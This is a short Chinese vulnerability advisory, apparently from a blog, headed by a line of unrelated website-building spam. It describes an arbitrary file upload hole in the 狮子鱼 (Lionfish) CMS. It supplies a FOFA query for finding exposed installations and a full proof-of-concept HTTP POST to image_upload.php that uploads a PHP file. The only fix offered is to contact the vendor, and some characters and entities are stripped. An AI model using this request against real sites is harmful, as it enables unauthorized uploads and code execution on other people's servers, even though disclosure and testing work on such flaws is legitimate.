新网建立网站,如何建一个网站多少钱,资源网站的建设方案,做网站图片如何不转下一行Nx01 产品简介 狮子鱼CMS#xff08;Content Management System#xff09;是一种网站管理系统#xff0c;它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能#xff0c;包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面#xf…Nx01 产品简介 狮子鱼CMSContent Management System是一种网站管理系统它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面网站所有者可以方便地进行内容的发布、管理和布局。
Nx02 漏洞描述 狮子鱼CMS image_upload.php文件存在任意文件上传漏洞攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。
Nx03 产品主页
fofa-query: body/seller.php?s/Public/login Nx04 漏洞复现
POC
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary----WebKitFormBoundaryjGdyeoVHUBbniBlK------WebKitFormBoundaryjGdyeoVHUBbniBlK
Content-Disposition: form-data; namefiles; filenametest.php
Content-Type: image/gif?php echo hello?
------WebKitFormBoundaryjGdyeoVHUBbniBlK-- Nx05 修复建议
建议联系软件厂商进行处理。
